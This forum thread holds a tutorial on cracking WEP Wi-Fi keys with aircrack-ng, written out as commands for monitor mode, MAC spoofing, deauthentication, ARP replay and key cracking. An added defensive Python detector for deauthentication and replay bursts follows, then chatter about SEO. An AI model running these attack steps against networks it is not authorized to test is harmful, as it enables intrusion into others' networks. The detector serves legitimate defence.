[TUTORIAL]WEP Cracking with Packet Injection
07-01-2011, 02:16 PM
Post: #1

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
[TUTORIAL]WEP Cracking with Packet Injection
I wrote and published this last night:

Quote:
Set your wireless card into monitor mode.

You need to have a wireless card that supports monitor mode. Monitor mode allows you to listen to all packets instead of only packets intended for you. This is done by creating a virtual interface to act as a second wireless adapter using the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.

Take the interface down:

Code:
# ifconfig wlan0 down

Bring the interface back up in monitor mode:

Code:
# airmon-ng start wlan0

Test injection capabilities:

Code:
# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0
  • -9 tells aireplay to test injection
  • -e is the ESSID of the AP
  • -a is the BSSID (MAC Address) of the AP
  • mon0 is my interface in monitor mode

Start grabbing IVs:

Code:
# airodump-ng --bssid 00:11:22:33:44:55 -w ESSID mon0
  • --bssid is the MAC Address of the AP
  • -w is the prefix for the capture files; I normally use the ESSID
That’s all you need to do for a passive attack. Now we’ll speed up the process.

Authenticate with the AP:

One of these will work better than the other depending on your scenario. Choose what works best for you.

Code:
# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
Code:
# aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
If neither of those works, MAC filtering may be configured and you will need to spoof your MAC to an existing client. Then you can either move on to the next step, masquerading while the client is still up, or send a deauthenticate packet and try the previous step again / wait for the client to reauthenticate and send ARP packets.

Code:
# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

Inject your packets:

Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose authentication just perform what you had to do in the previous step. Now we’re going to start repeating ARP packets.

Code:
# aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

Crack your data:

Once you get about 20,000, you can try to see if you can find the key. You can perform this step while still collecting IVs. First we’ll try to crack based on a 64-bit key. Replace ESSID with whatever you put for the -w parameter for airodump-ng previously.

Code:
# aircrack-ng -n 64 ESSID*.cap
If that doesn’t work we’ll try for a 128-bit key.

Code:
# aircrack-ng ESSID*.cap

Conclusion
The process to break through WEP can be completely automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.

Original Post

A few additional points that I didn't publish in my article...
  • If you can choose between the ieee80211 stack and the mac80211 stack for driver support go with the mac stack.
  • A card designed for monitor mode works best. The one in my laptop was ripped out of a wireless router.
  • Use more than one device if possible.

There are alternative crack algorithms you can have aircrack use. The default only works with ARP requests but is the fastest. The Korek method is the oldest but works with any data and requires a full packet. There is also a brute force method which always works, you just need to have a lot of time on your hands.

Other injection methods can be used when playing around with aireplay. Repeating broadcasts works best if you are up against MAC filtering. You don't have to associate if you are just relaying broadcast packets.

If you have access to a machine on the network, or can wire your machine in, you can speed up the ARP collection to grab the key by pinging a non-existent host.

It might take a while to get your first ARP request but they grow exponentially once you get injection started.

There are other ways to get the key which are useful if there is no network activity which I may write an article on here about later.

-- Hope this helps some of you.
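
The two noisiest steps in the tutorial above, the deauthentication (aireplay-ng -0) and the ARP replay (aireplay-ng -3), are also the easiest for a network owner to spot in a monitor-mode capture: deauth frames arriving in a burst against one client, and a data frame of one fixed length from one sender repeated hundreds of times a second. The Python below is an added example, not part of the original post or of the aircrack-ng project. It runs two sliding-window rules over a constructed list of frame records (timestamp, kind, source, destination, length) standing in for fields you would extract from a real capture with a parser such as scapy; the window, both thresholds and the 68-byte ARP frame size are assumptions to tune for your own environment, and the MAC addresses are the placeholders used in the tutorial.

```python
"""Sliding-window detection of two wireless injection patterns,
a deauthentication burst and an ARP-replay burst, run over constructed
802.11 frame metadata (example code, not part of the original post)."""
from collections import defaultdict, deque

WINDOW_S = 2.0          # sliding window length in seconds (assumed tuning)
DEAUTH_THRESHOLD = 5    # deauth frames between one AP/client pair per window
REPLAY_THRESHOLD = 50   # same-length data frames from one sender per window
ARP_FRAME_LEN = 68      # assumed on-air size of a WEP-encrypted ARP request

AP = "00:11:22:33:44:55"        # placeholder BSSID, as used in the tutorial
CLIENT = "AA:BB:CC:DD:EE:FF"    # placeholder client MAC, as used in the tutorial


def build_sample(with_attack=True):
    """Constructed frame records: (timestamp_s, kind, src, dst, length).
    kind is "deauth" for deauthentication management frames or "data"."""
    frames = []
    # Ordinary traffic: the client sends data frames of varying size over 10 s.
    for i in range(40):
        frames.append((i * 0.25, "data", CLIENT, AP, 100 + (i % 7) * 33))
    # A single deauth, as happens when a client legitimately leaves the AP.
    frames.append((3.0, "deauth", AP, CLIENT, 26))
    if with_attack:
        # Deauth burst: eight frames in 0.35 s aimed at one client.
        for i in range(8):
            frames.append((5.0 + i * 0.05, "deauth", AP, CLIENT, 26))
        # ARP replay: the same 68-byte frame repeated 120 times in one second.
        for i in range(120):
            frames.append((7.0 + i / 120, "data", CLIENT, AP, ARP_FRAME_LEN))
    frames.sort()
    return frames


def detect(frames, window=WINDOW_S,
           deauth_threshold=DEAUTH_THRESHOLD,
           replay_threshold=REPLAY_THRESHOLD):
    """Return one alert per (rule, key) the first time its count within
    the trailing window reaches the threshold."""
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    fired = set()
    alerts = []
    for ts, kind, src, dst, length in sorted(frames):
        if kind == "deauth":
            # Deauth frames carry no authentication without 802.11w, so a
            # burst between one AP/client pair is the tell-tale sign.
            key = ("deauth", src, dst, None)
            threshold = deauth_threshold
        elif kind == "data":
            # Replayed ARP requests are byte-identical, hence identical length;
            # legitimate traffic rarely repeats one size this densely.
            key = ("replay", src, dst, length)
            threshold = replay_threshold
        else:
            continue
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in fired:
            fired.add(key)
            alerts.append({
                "rule": key[0], "src": src, "dst": dst, "length": length,
                "first_seen": q[0], "last_seen": ts, "count": len(q),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample()):
        print(alert)
```

Each rule fires once per key, so a long replay produces a single alert rather than one per frame; the window is trailing, so a lone deauth two seconds before a burst is evicted before the burst is counted and does not inflate it.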

07-05-2011, 06:18 AM
Post: #2

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

07-05-2011, 06:32 AM
Post: #3

Coder-san Away
~|0o|~


Posts: 2,623
Joined: Aug 2012
Reputation: 0
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
(07-05-2011 06:18 AM)slbmeh Wrote:  This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

I see it in the 1st page, 7th place. Using exact same keywords without quotes.
[link=http://www.google.com/search?hl=en&client=firefox-a&hs=RLf&rls=org.mozilla%3Aen-US%3Aofficial&q=WEP+Cracking+Packet+Injection&aq=f&aqi=g-v1g-b1&aql=&oq=]WEP Cracking Packet Injection - Google Search - Mozilla Firefox[/link]
Or did you mean your blog's page?

Btw congrats on the domain :)

Redcat Revolution!
07-05-2011, 07:06 AM
Post: #4

slbmeh Offline
PHP Expert


Posts: 209
Joined: Aug 2012
Reputation: 6
Currency: 0.00 NSP
RE: [TUTORIAL]WEP Cracking with Packet Injection
(07-05-2011 06:32 AM)Coder-san Wrote:  
(07-05-2011 06:18 AM)slbmeh Wrote:  This is the 8th page on google for "WEP Cracking Packet Injection"... Can't seem to get the keyword density right for the OC to actually come up in a search...

I see it in the 1st page, 7th place. Using exact same keywords without quotes.
[link=http://www.google.com/search?hl=en&client=firefox-a&hs=RLf&rls=org.mozilla%3Aen-US%3Aofficial&q=WEP+Cracking+Packet+Injection&aq=f&aqi=g-v1g-b1&aql=&oq=]WEP Cracking Packet Injection - Google Search - Mozilla Firefox[/link]
Or did you mean your blog's page?

Btw congrats on the domain :)

Oh ya, I meant 8th on the page... I wonder if the crawler hit the page between the time I posted and you posted and grabbed the keywords I put in the post.

Thanks for the congrats about the domain... I decided since I'm working on the SEO from the start... I might as well give all the good link juice to the real domain and not try to move it with 301s over time... Moving the host under the same domain is nothing compared to the SEO nightmare of changing domains...

That page is harder to target than say... slbmeh... because there are so many articles out there about it... I think I have a good saturation in the keyword density for that... long tailed keywords are easier to target... I think once I get a few good backlinks and a page rank I'll be set... these forums pretty much built my confidence up on that now that I'm talking about it and actually thinking instead of just being mad... The full article will get more hits on keywords in the article and in the meta... I just fixed my home page to show an excerpt instead of full article so I won't take a hit on duplicate content... So, in theory... once I get to the same PR level as HC I should sit above it in search engines...

Crazy thing on a side note about google... The crawler is hitting my entire site four times a day... My sitemaps must be structured well along with playing well with robots.txt... because it seems to like me...

Edit: Just updated all entries to include the <acronym> tag to get more keyword hits...


